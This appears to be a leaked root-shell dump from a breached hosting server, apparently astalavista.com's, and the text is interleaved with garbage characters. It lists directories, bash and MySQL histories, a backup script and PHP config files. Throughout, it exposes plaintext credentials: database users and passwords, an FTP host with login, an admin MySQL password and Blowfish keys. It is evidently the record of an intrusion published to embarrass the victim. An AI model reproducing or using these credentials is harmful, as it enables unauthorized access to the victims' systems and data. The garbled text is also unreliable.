/ r/ g; c6 e# V/ x6 T3 i# #( M1 T3 \3 `2 F. s3 U# ]* I
#####################################################
9 Y9 ^/ P# {2 e# #& J7 K' _' R: W; L
# Admin Contact - 链接标记[email protected] #
' a& T2 r* m* e" @5 A4 n) E# #
! a6 D4 o) y& I$ S* \# Available ShortCuts #
+ N7 l+ }" L# ?/ J# #4 X0 }) E5 s X* |; r8 B3 Z
# nst - list active connections #8 l. U; S% s' Q" Y
# ddos - shows how many times each ip is connected #' ?3 D# K2 {/ V( h! T
# ltr - restart the webserver #
) O6 e+ b. Q" W" u1 _" J# phpc - edit the php config file #
. J" q9 j5 J9 a# htc - edit the webserver configuration file #
& N* p) O+ p0 s2 N8 g" [9 I: Q$ v# up - uptime #
" L0 I) k5 ]: T- d' r8 C9 W7 X2 P2 ]9 R# etd - edit the motd of the day file #
6 r+ {* h0 _: `# htr - start and restart apache if needed #
]* J8 W% { a# D) u# syng - shows active SYN_RECV connections # V9 l k' y/ Y$ Z- s: ]
# synd - syn flood blocker - “synd -h” for usage # t. z0 p {% G- W' o2 K: k5 D/ ?. b
#####################################################! c. ~0 R9 Y5 q' U& w9 o6 ^
# NOTES: ## t5 [ [- Z ^( z! g; U
# Last Upgrade - 12-08-2008 by JF #
1 f. C7 V$ G) A: W$ F# My.cnf/Mysql Optimization - 1-28-09 #
, f5 O% ?( U" f h$ e3 W6 |# #* F' ?- u X1 v. u! A
# #1 M$ P1 ~6 v/ I) P$ m
# #
0 S9 _* }5 M* Y#####################################################
: l* A$ c) R, J" A' G8 a! ], X
n# W* J+ F4 H# G1 Lsh-3.2# lastlog | grep -v Never- m. ^0 r! Y! b+ k, P' B
Username Port From Latest2 ] p7 H h6 t) y6 A* E8 Z
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
2 G& }3 w; a7 h: o( Oadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20081 k$ \! ?4 P+ ?$ a" J7 g0 g
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
) `2 m" q9 J- iastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
+ s! q0 k4 v1 M
% j8 J- Y* M9 d" p$ q/ ^sh-3.2# ls -la
3 p9 s) U- W" {% D9 a3 g2 ttotal 453376" b# }, o4 e4 h
drwxr-x— 15 root root 4096 Jun 4 08:40 .6 A7 l$ U# _7 Y" d h7 F# I& h
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..- U$ t$ R# U1 Z' @% ^
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
! X) ~% W* `; X ?9 `- m-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg; M7 D, S* U+ D1 d* P
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history" b( [: o4 i' F- g
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout) z. d, ~5 w% w
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
5 p0 J; n/ h! D* A; [3 \+ p! Z-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc5 _* N3 `2 w. a+ t# o
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh: J' _) V# e+ a9 \* I8 W
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
! t3 s; @( p6 K+ @: N, g# ^% r# R3 m: N-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql! _( i/ x3 l& I4 r4 U$ Z7 \
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
q: U; |" H' ?- x0 w- Y) c-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc% O9 _" l7 e' ^
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
7 K, r, k& @7 B+ W ldrwx—— 2 root root 4096 Oct 28 2007 .elinks o, y( E6 R* a$ n7 o: c5 Q
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
1 Q! v8 A3 P& D1 i* j! J-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2 W+ f; A! [1 l9 F
-rw——- 1 root root 0 Apr 16 13:19 .history3 f- | }$ _# ~* B. d- f7 J
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
# j" D* o2 Y6 G9 F-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
4 s A. z% l6 `- B4 L% X3 C( t1 N-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh' W: F' K- w) d5 r! ?# s9 ?
-rw——- 1 root root 35 Jun 2 14:23 .lesshst) `# u' R4 l& X% V0 g
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp$ n# H* y# w0 \ r1 f
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
* r9 g. L b9 X* ~-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
E2 g6 T% _; d7 y; g3 I" G* C% O-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2+ u0 I5 Y$ G z: D4 d
-rwx—— 1 root root 760 Sep 18 2008 lp
- d9 W0 U+ Y4 h! | [( M$ |drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.14 T( d% _- I! N# s0 C0 T2 [
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
/ ?/ R( J9 v0 G- V& O0 D2 i-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1' u; b! ]; M3 C+ _% G8 z
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
7 B. Z% n4 @0 i9 H& ]$ q( N-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
: @. a$ s4 E( C! |( [) Tdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
& y5 F c' s& s3 [2 A+ s, T-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz- L* Z _) J J% a
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh f# m! o$ @0 K2 w
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
4 j3 E$ M4 q7 [& \# D-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history2 w$ O1 e. |+ f3 l7 M; y& m
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
5 }; Z! X! h9 c7 v- g/ r; G-rw——- 1 root root 41 May 20 2008 .mytop4 u& ?# b/ [ _- L Q
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.62 _, b- s+ F7 B
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz( W3 Y. [* \. ~ F) M: T
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
! P4 s9 b1 | C4 \& o X! _9 X' j-rw——- 1 root root 1462 Sep 21 2007 opt.php
% S- x* R) D! N8 M-rw-r–r– 1 root root 3371 Sep 22 2007 p6 T$ o# X8 y. n* n. [+ P: z
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz24 l# q# O% r, w; g* b
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
: U$ R h, z/ ^0 d* w Y5 C-rw-r–r– 1 root root 716 Nov 28 2007 server.csr$ N9 @: Q8 d; A2 q6 S
-rw-r–r– 1 root root 887 Nov 28 2007 server.key2 i- {: F( \( p8 H
drwx—— 2 root root 4096 Oct 10 2008 .ssh
$ c, F) j9 V6 M+ S-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat" {+ \3 D9 M' r, k. l. h8 u
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
0 \; P5 p2 f2 I) M-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
" h; J% B- G+ N' {5 Q0 ]! }4 Y3 B-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
' j6 N1 m3 f0 M& @ a" Z6 p7 qdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
X7 e, M0 K7 N* B! M2 e6 m( J/ e-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh. T9 u, S& t' k
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
" m) F9 w/ k# _* ^3 j-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
D! \" f! a4 S' J8 i8 G$ D& Q5 C+ s-rw——- 1 root root 12997 May 16 2008 .viminfo
9 L6 }- ~1 `+ B$ R7 R1 j7 Z
7 `. G+ f: \+ \& W$ k6 csh-3.2# cat .bash_history
+ U1 b& W( w# d2 L* E[snip]6 n( n- W( ?6 _/ l( ]; b
wget cp4sst.com/sstlinux.tar.gz4 \( O: J- s! |' i3 }$ ]) U
tar zxvf sstlinux.tar.gz0 Y: R0 l1 b6 W! |. Y% y, E7 d
cd linux-2.6.27.102 q3 z$ h1 a2 Y+ Y4 w
sh install.sh* `( s! U' U K5 n/ t$ q, _
make bzImage ; make modules ; make modules_install ; make install
' n% M0 t( [ Y4 g6 fmake clean
+ q; ^7 n! o' G6 ]/ Y% ?2 W8 Lservice mysqld restart
7 Y* }8 i9 L8 C; o; B[snip]3 i: h4 t$ G- j' n8 Q) h% O" a
cd /usr/sbin/
F5 A0 t, F5 f) Y# E- schmod 4777 traceroute
5 C8 m* Q/ j* m3 B" mchmod 4777 ping7 H V7 M% y& H( @' z
traceroute -I 链接标记[url]www.astalavista.ch[/url]
6 p6 j% c9 T8 @1 e[snip]3 B' ?& w. P+ Z5 i0 X
vi /etc/csf/csf.conf
0 \! e' U3 g0 S( `9 o1 ptraceroute google.ch: a; f) a/ c7 }% `, D# M) d$ g! A! I
service csf restart6 I; z0 V3 J, O+ t/ S; Z$ Y3 A* u
tracert google.ch% |4 Y% G/ e$ d
service csf restart% L0 Y$ T3 F9 u$ n1 n( V6 d% |
traceroute 链接标记[url]www.google.ch[/url]' Y) z' T4 Q& V$ g# i. p# O
tracert 链接标记[url]www.google.ch[/url]2 S- @' G; `. c. h# M$ Z, w
traceroute 链接标记[url]www.google.ch[/url]" |" y3 |3 w1 }: B' p
locate traceroute
' H/ \( O+ Q4 O. ychown 4755 /bin/traceroute
0 v: D2 x" r. e; k2 m$ Zchown 4777 /bin/traceroute& I, X ^: n7 y: K9 h& w
locate ping1 B% g) a0 t% J C' I/ m( g9 T
chown 4755 /bin/ping+ ~( |0 h4 c* B6 s, c9 i
chown 4777 /bin/ping) O: _4 d* j0 b
cd /bin/' n2 t9 A: V3 J* D# n8 ^1 L
ls -ali | grep ping
: W7 _ S/ i0 C3 w3 M zchown root ping1 a4 S% x6 x2 U8 z
chmod 4755 ping
4 {. I: ^* ]6 u& }3 q7 jls -ali | grep traceroute
! u$ X# W+ Y, u' [" y$ lchown root traceroute0 ?( i' ?/ J$ b/ F; r
chmod 4755 traceroute K3 N* p( G* g4 K# b
ls -ali | grep traceroute
: s3 s d: m; {& w1 _" c* qtraceroute -I 链接标记[url]www.google.ch[/url]
8 ?4 D6 ^% }& T9 f0 Q6 Ytraceroute 链接标记[url]www.google.ch[/url]
$ N4 I6 z. r7 L- Zwhois pmsantos.ch# l c/ M! n @1 Z
[snip]
$ U( E; Q( }; Kmysql -h com_contrexx2_live < /root/defaultp_ports.sql4 X9 r/ a2 j- x4 f
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
. T( i3 }9 I& m8 ymysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql& y& {) M, V: C0 R# T
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
7 b' j7 d$ D3 P+ f3 C5 o+ Qtop
6 o7 P0 M9 n' G6 bping ssth.ch# f, X6 {3 m! }$ t
ping asdlkfaljgasd???ljg???lasj.ch5 q0 Q& ~: i6 b* K. e, \( c
ping asdlkfaljgasdlasj.ch
! |( Q: T4 p) m3 b, h* s5 g+ z) Bping 链接标记[url]www.ssth.ch[/url]( I: y( A! a {' |4 `1 j
ping ssth.ch
* {( g( F+ w& [2 [' {nslookup 链接标记[url]www.google.ch[/url]
$ p# u4 X3 P* f4 P6 x G5 Inslookup 链接标记[url]www.ssth.ch[/url]$ r O4 o5 }: N# p- w- F' i# p, P5 c
man nslookup: ~# K! }2 X/ ~0 g0 J
ping 链接标记[url]www.google.ch[/url]+ W) e p! a4 t( m
nslookup 链接标记[url]www.google.ch[/url]
& H% Y. ]( x8 Z- D8 Y+ Onslookup 链接标记[url]www.google.ch[/url]
' C$ M6 N. D U, L! D! qnslookup salfjasdlf.ch
- Z: J0 P' C$ O4 V, v5 F[snip]
" l) N, V2 w: \7 mopenssl passwd -1 sadf" H3 N( n2 x% d6 d% i
openssl passwd -1 5cZNHstdTy
* g3 f" P8 ]+ s2 Emysql
I. w t1 k0 H: \; z) Zmysql
, ~8 O( B6 W9 ]1 O3 K7 U/ s6 rlocate proftp I [: z3 e9 a3 U
vi /etc/proftpd.passwd# Y! ^! ^5 i: G3 I
service proftpd restart; T$ e6 i1 }/ C a7 g: _
locate proftpd.conf
/ }5 p' p ?' Q' K2 R3 Qvi /etc/proftpd.conf
0 h& A# b/ u! a7 Q( zvi /etc/proftpd.passwd
$ P: H. m) @, A6 ]1 X5 k. f5 i |service proftpd restart, r7 y8 u8 K; w" o% q
[snip]& I3 V$ P& F0 i3 Z9 K& v2 J" I, Y6 ]
/bin/sh /home/com/backup_system/backup.sh
& y( z; ~3 a% q( {tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
) y# r% F, x4 F9 Y( pmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
2 `, [/ V* @7 M6 R8 h/ |/ Dmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql8 x4 k3 a, y# O6 m' Z: ~
ls -ali
/ @' q# U/ w& \0 {( s0 o- hmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
' ~+ x0 _. `& I. O7 J7 x! [mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql+ Q, \& m2 C6 h! x* O
crontab -l
5 ~; \4 M4 ~0 q' g/ ecrontab -l: Y) F9 w; j& n4 ~" F" Z& F
php -q /home/com/public_html/modifications/cronjobs/securitynews.php+ m5 m) j, f# r i
/home/com/public_html/modifications/cronjobs/exploits.sh! l% g# \4 ]! R U! H
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
" I0 W: p+ x) m$ s1 f& Btar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz6 \/ k; W- t0 ?) Q6 W" y+ U9 H
cd lsws-4.0.3
; G% } T: [' a4 o) V0 {& n9 @sh install.sh
' Z8 Y* [4 j! E8 q1 v! J4 Ouptime
/ ?; }/ D! j% x& d, t- E5 @hdparm -tt /dev/sda
# z( x1 I7 Q! b4 Q( uiostat
9 C. S/ ^4 ]) S5 V$ \yum install iostat v) g8 u8 K8 h& V7 o% y, Y
iostat
* n! p/ Z6 Q5 e. |. l8 |whereis iostat/ }% R7 r J5 U7 S8 c# g
yjm clean all
% {) ]% `) D" ]yum clean all ; yum -y update, b( R* y8 A& C) e
iostat; r6 q9 x2 e# \5 Z2 j: M
yum install systat: D. Q8 V$ [. T. l8 E- A
rpm -qa | grep iostat
8 q* w. J- n9 g! brpm -qa | grep sysstat
" p0 O, M! m' d: [rpm -qa | grep systat* n( M! Q1 ^& x" ]8 Y F5 z
dmesg -c
0 A5 S( G! H) m( s: s! msysctl -p
0 Z+ z" X$ I1 M1 uuname -r
6 s5 |3 A9 P; Hcd /usr/src
4 _ x5 ~: b5 S8 }) H. }; jwget nix101.com/kernels/sstlinux.tar.gz* j, a7 M! z" |% E
shutdown -r now, C& ?; B+ h6 C. n4 a5 V% V! w
nano -w /boot/grub/grub.conf5 d6 \, o% U" u0 C
0 c" Q, z5 \2 `- X8 y
sh-3.2# cat .my.cnf
' P3 |, y$ a' g b1 @8 e[client]0 c# E# ]8 V( h1 X- ]' N4 y# P" `/ [
user=da_admin2 y, p4 J! W, J6 B2 r
password=X9dctmRH, c4 X) t% `) o
3 r J: w, U9 Psh-3.2# cat /home/com/backup_system/backup.sh
\9 Y# w, Y. K& u+ K) D#!/bin/sh2 P) U4 a& N" t0 A3 `, @
#####################################################################* K' g& F# U( m+ F" e0 v
# #
( z$ X0 D) m' V" Q ?# incremental backup for astalavista.com #" \/ L; r* T, ^0 x% Q" X" f# [7 o
# #
, O' ^+ `/ v3 U" g* `0 z# author: Paulo M. Santos <链接标记[email protected]> #
: R" P2 a% s* j# h7 }! p- u- ]# #$ U [& U# N1 T
#####################################################################0 g' G8 c1 D4 M5 `/ Y
[snip]
! r0 \. ?4 m8 Q k: s. TPROG_DIR=”/home/com/backup_system”;( g. {# s. u( H2 T1 R
BACKUP_DIR=”/home/com/backups”;
$ b- R8 D2 p6 |. n' E! ODOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;. W6 N) _- o. {3 f, y
# ftp for synology backup server
9 |. D" n. e6 L& i5 x$ v/ y- tFTP_HOST=”212.254.194.163″;6 P% s. j7 n- ]0 K/ y. v3 Y, q
FTP_PORT=”21″;
/ E" L5 k: h: x$ nFTP_USER=”astalavista.com”;
% h0 i% z5 b0 m4 P! ]FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;( c, }: u5 |6 `- P% D
FTP_DIR=”/astalavista.com”;
6 D W9 U' q# {% B5 r" T# database/ b7 {6 r( N4 X# r+ w0 c% P
DB_HOST=”localhost”;9 D$ l9 F1 U5 Y; X
DB_USER=”contrexxuser2″;
- s: `: I/ a& D0 O) B, QDB_PASS=”0fEYNZgXz1pKe”;
9 m) z4 z( g1 X1 u" s4 xDB_DATABASE1=”com_contrexx2_live”;
7 ~* G0 Y6 G- e: _) pDB_DATABASE2=”com_contrexx2″;
% V9 L2 T! p% c[snip]# w! @* d$ f6 S' Q$ Y$ B, |* I, n
ftp -in $FTP_HOST $FTP_PORT <<EOF+ b' B$ u6 N* M2 `5 ]# k5 M; x
quote USER $FTP_USER3 O, D; S- D3 |1 M8 v- A
quote PASS $FTP_PASS0 u8 X) v5 v% r0 E; H
cd $FTP_DIR
) K: s( T* J4 Aput $DB_FULLNAME-SQL_Dump.tar, c3 B5 h' O+ Y* |) T, K
put $BACKUP_FULLNAME-Public_HTML.tar2 c) X# N+ v+ U7 }( W
close6 o5 c. P; @* L) `
bye
2 j/ {% v& H g5 qEOF
d2 v2 ?+ d7 y$ o, u
/ x& V x1 G. E1 V5 Csh-3.2# cd /home( x$ I; k, Q, N
sh-3.2# ls -la
- H3 A, d! J4 d" G4 ]( a$ @ rtotal 120$ F. P2 _9 \4 m( _6 ~! C5 F) r
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .) ]9 m0 R% I4 s9 y% R
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
% ~, Y9 V( y) I, }drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
: F8 f/ F* F+ E O3 ]-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
& u4 ~* U0 g) f& i u. r9 j) o' P4 e-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
' z# F; c! I' i7 G: w1 M* tdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
7 s" }8 m! D8 m" ^0 ]. s( m8 Udrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
+ Q# \9 N( ~2 z) s' C2 M% Odrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
* `! ]2 A8 z6 W& [/ j" C/ j( X6 mdrwx–x–x 10 com com 4096 Apr 28 12:40 com, g, f! f6 S1 k! j3 ?/ }
drwxr-xr-x 2 root root 4096 May 17 2007 ftp$ L( ~- z7 X: m) Y6 c6 s& i/ ]0 _
drwx—— 3 jon jon 4096 Sep 21 2007 jon% f# }! L# H2 H$ w( E! ?
drwx—— 2 root root 16384 Sep 11 2007 lost+found3 U2 P8 U# p, a
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
) n$ k6 ^. R( Y" E6 l fdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
3 P% K1 t Q! h/ |! e# Tdrwx—— 2 jon jon 4096 Sep 15 2007 test3 C0 M- U/ m( K% U( O& L7 g# N0 {2 c% |
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
0 W$ o; ], \- |5 Y6 b' l: Q( y3 Q! v
sh-3.2# cd admin8 g' S- a1 K I, G7 z6 ?
sh-3.2# ls -la
6 W0 V8 M* m, H8 l# [8 Qtotal 1735896% o; e2 i4 z# o+ S; H8 e: d
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
2 S @ l1 F0 i+ F! V, ?' v9 Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 S p# W4 W9 @" C
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
# T1 Q0 w1 y( L/ P- m6 Y _drwx—— 2 admin admin 4096 Sep 28 2007 backups
7 h+ d# R; H! [: _-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
2 m6 k( V% Z0 i$ g2 i-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout9 J |1 q, x7 Y `' h
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile$ I5 j4 e" x/ a* Y! V1 x$ [
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc% G5 S8 J) C& n" o
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups8 r; b; ]1 K' c, M( [
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
$ O6 _3 U& J3 a4 E* Pdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
4 W$ a7 s* v/ Z- O( j; V% ]$ d+ b+ U: A-rw-r–r– 1 root root 24 Sep 21 2007 info.php
! e8 ^4 X- ?* c% y2 \- ^/ z- qdrwx—— 2 admin admin 4096 Sep 21 2007 mail7 A2 |/ K+ H2 z; W; ^/ M
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr! t% A' |$ i M5 F1 I
-rw-r–r– 1 root root 887 Nov 28 2007 server.key) q3 |& u/ d8 A3 s
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow( W' x( z4 \) N4 K3 ~0 h, m# {
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
- [2 L/ y. f5 z; _drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
! x& z) ~/ |/ x- |( P5 ~7 R% @5 Q' C. x' Q4 y# V$ b( Z
sh-3.2# .. t7 ]8 u4 u' c0 b5 D/ y" B+ [$ c+ c
sh-3.2# cd jon
+ s2 X- @; R* M6 A5 g; C; Csh-3.2# ls -la* J2 R% ?( j D4 z7 A; P/ W) A
total 36& `+ C' H7 m$ ?& O5 y. d
drwx—— 3 jon jon 4096 Sep 21 2007 .
' H5 c& y2 v. s5 ?6 _8 o' kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 C: I' D% o+ w) b2 Y! ]6 w-rw——- 1 jon jon 53 Sep 21 2007 .bash_history! J7 c* @# K! I. i$ w& }( g
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
# ?9 w7 F8 E9 C) G( A" Q-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
0 f' x7 P ?6 q* ^-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
4 M2 z" z5 ~3 n7 d: E-rw-r–r– 1 root root 24 Sep 21 2007 info.php# {% `8 W+ M4 ?9 f; J, p: x
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
: P% Y5 o, @' D% W `
& y9 k5 R5 [# n. |8 Q, }" B! S nsh-3.2# cd ..
- @: h1 {- T0 e$ ush-3.2# cd test
7 S0 w8 Z# G$ u3 _) f/ ssh-3.2# ls -la/ O! k8 x; h; z5 Y4 ]+ K1 B2 b
total 48- v, U$ _( q; s+ L; D. ]9 [
drwx—— 2 jon jon 4096 Sep 15 2007 .
$ R) C6 H1 A1 @9 M' @3 Pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 O; n: }9 z1 Q
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history5 U4 @1 K4 S5 L9 @3 {
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
- n8 H7 t5 T, h9 J" t# L8 s-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
0 f. k8 `7 l8 [-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc! ~" p: E& {7 H" j
sh-3.2# cat .bash_history
$ w1 H! \6 P- P7 X# m5 k0 A( S% r/usr/bin/mysqladmin -u root password PoliuJhytg67. G' F0 e0 f. M! z" \
) u! i9 i3 @9 T' a ~: R1 Vsh-3.2# cd ..$ D" `; s, `' u2 A
sh-3.2# cd astanet2 _6 j& w& d. v0 L% J; C1 l" S5 G
sh-3.2# ls -la' z) V3 c& s. J* Y; _$ Q5 F, _9 t! Z
total 52
& U- ]6 @+ X4 G, V" M( ?drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
3 O9 ]* x1 g( i0 Z- Ldrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 Q1 N$ k/ E# ndrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
* v9 l' U7 X- S) \/ Q( t, Y- n! ]1 e-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
& w0 n! O% o( [# b; a-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
& n4 ]) F3 t$ A" K-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile8 X# W! p: p" K# n% |2 {
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc# x, C' H; b8 L
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains+ A/ ^4 d+ F3 w
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap6 d0 k1 O, E! X# y
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
0 O1 l, k% h1 A4 m7 b9 f! V-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
1 k( r7 T+ D9 D& |+ P: {( G3 q. V) mlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
* @" `+ u! z# n" X7 J-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow$ Y; C' E8 L o, A2 s" \
& Q' c3 ~# M7 A4 Y, A) z
sh-3.2# cd auth/% c0 v; m* H# d4 I5 P2 F2 d& p
sh-3.2# ls -la' E& N: z* \9 p
total 28
/ ~% h! M/ @: N* p. L& Zdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
- V3 Y, |% T4 d8 Ddrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
- u1 B7 W* H7 x( s0 ]$ [, V/ G-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
3 U3 ?; j% Y, Y w& Y: |-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
8 l( H/ X+ B# ~2 r5 ~-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
! ~& `9 u3 o8 j, Z5 ~6 S-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
6 {4 d: \: t* `4 D-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd" z% G6 y" @; w2 E6 q
+ X7 w5 C. Y" }3 Hsh-3.2# cat hackercontest.config.inc.php
8 g" N1 V" X1 o) d3 D% b: T* {<?PHP3 t! G! h2 T g; I( g0 r
// Variabeln f?r Verbindung zur Datenbank //
- s! S2 t5 N# x/ }; P0 g! W$ s, p$conxHost = ‘localhost’; // MySQL hostname( E/ |; u$ P' r) |' X
$conxUser = ‘hackercontest’; // MySQL user3 Z7 b" E8 g( x8 s
$conxPassword = ‘K6m@7dUc’; // MySQL password* J& ~6 Z3 B/ c# |9 t. R3 s
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# `/ E. p/ T- z7 ?- j. u$ t4 w
?>; R5 M$ H9 W; w
sh-3.2# cat hosting.config.inc.php
$ |7 T7 s" `: O( S<?PHP
6 ? }9 C5 X* N2 \3 [// Variabeln f?r Verbindung zur Datenbank //
% V3 Q. y2 [3 L' _$conxHost = ‘localhost’; // MySQL hostname
* G# w% s# m7 L% p7 I$conxUser = ‘hostinguser’; // MySQL user" `/ e9 o \" W d- n# a
$conxPassword = ‘cXvB3981′; // MySQL password0 | e* T2 C- w4 [# I N6 w& X
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish1 V3 P$ J$ l% c' s! W8 I% @4 Q' p
?>
' C% R, ^, _% R, `, u5 |
" \ d- \( b9 U0 a" vsh-3.2# cd ..4 z8 |4 t' m" U4 c4 Q# S w8 O0 k
sh-3.2# cd com+ B. z. `/ x5 G
sh-3.2# ls -la3 n% D: p- q! X/ p3 J
total 141208& Q7 |$ G# _1 A# U0 N
drwx–x–x 10 com com 4096 Apr 28 12:40 .
" Y8 o- ~5 V% i+ adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
) e/ K" U1 w3 k1 q5 Bdrwx—— 2 com com 4096 Jun 4 04:04 backups- x7 Z2 y! t2 @) K* B, `
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
